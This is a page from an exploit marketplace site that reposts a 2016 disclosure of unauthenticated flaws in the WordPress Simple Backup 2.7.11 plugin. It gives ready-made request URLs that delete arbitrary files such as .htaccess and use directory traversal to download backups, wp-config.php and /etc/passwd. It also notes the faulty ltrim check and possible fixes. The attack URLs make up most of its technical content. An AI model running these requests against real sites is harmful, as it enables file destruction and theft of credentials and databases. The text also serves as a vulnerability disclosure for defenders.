0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress Simple Backup 2.7.11 Plugin - Multiple Vulnerabilities
#################### # Meta information # #################### # Exploit Title: Wordpress plugin simple-backup - Multiple vulnerabilities # Date: 2016-06-02 # Exploit Author: PizzaHatHacker [A] gmail [.] com # Vendor Homepage: [DEAD LINK] https://wordpress.org/plugins/simple-backup/ # Software Link: [DEAD LINK] https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip # Version: 2.7.11 # Tested on: simple-backup 2.7.11 & Wordpress 4.4.2 # # History : # 2016-02-21 Contact requested on the vendor website via "Contact Us" # 2016-02-24 Contact requested on the vendor website via "Support" # 2016-03-09 Email to plugins@wordpress.org # 2016-03-10 Acknowledged by Wordpress team # 2016-06-02 No information, no response, vulnerabilities not fixed, # disclosure of this document. # ################################## ### 1. Arbitrary File Deletion ### ################################## It is possible to remotely delete arbitrary files on the webserver on wordpress blogs that have simple-backup plugin installed and enabled. No authentication is required, the default configuration of simple-backup is affected. Example 1 : Delete "pizza.txt" in wordpress root : http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=../pizza.txt Example 2 : Delete .htaccess file protecting the backup folder : http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=.htaccess&download_backup_file=inexisting Note : When 'download_backup_file' parameter is provided with an invalid filepath, the PHP script exits prematurely with message "Access Denied!" and so does not regenerate automaticaly the .htaccess file. After this request, it may be possible (depending on the web server configuration) to browse the backup directory and download server backup files at this URL : http://127.0.0.1/<WP-path>/simple-backup/ The backup archive files may contain all the wordpress files : configuration files (wp-config.php etc.), PHP source code (plugins, etc.), and a database dump (all tables content, wordpress users passwords etc.). CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P) CVSS Base Score : 7.5 Impact Subscore : 6.4 Exploitability Subscore : 10 ######################## ### 2. File Download ### ######################## It is possible to download remote files from the webserver on wordpress blogs that have simple-backup plugin installed and enabled. No authentication is required, the default configuration of simple-backup is affected. Example 1 : Download tools.php source file : http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file= Example 2 : Download a backup file : http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=backup-2016-02-21-111047.tar (If backups are performed automatically at predefined times, it is easy to find the backup file name, as it is based on the current time). Moreover, the checks performed on user-provided 'filename' parameter are insufficient : simple-backup-manager.php:function download_local_backup_file($filename){ $filename = ltrim($filename, ".\/"); * Only logged-in AND authorized users (with permissions to manage backups) should be allowed to download files * The file name should match a backup file and must not be empty * The input is not correctly checked for directory traversal (use PHP 'basename' instead of 'ltrim') For example in the special case where a folder 'oldBackups' is created inside the backup directory, it would be possible to download ANY file on the web server via direct requests to this kind of URLs : http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../wp-config.php http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../../../../../etc/passwd CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:N/A:N) CVSS Base Score : 5 Impact Subscore : 2.9 Exploitability Subscore : 10 # 0day.today [2024-09-28] #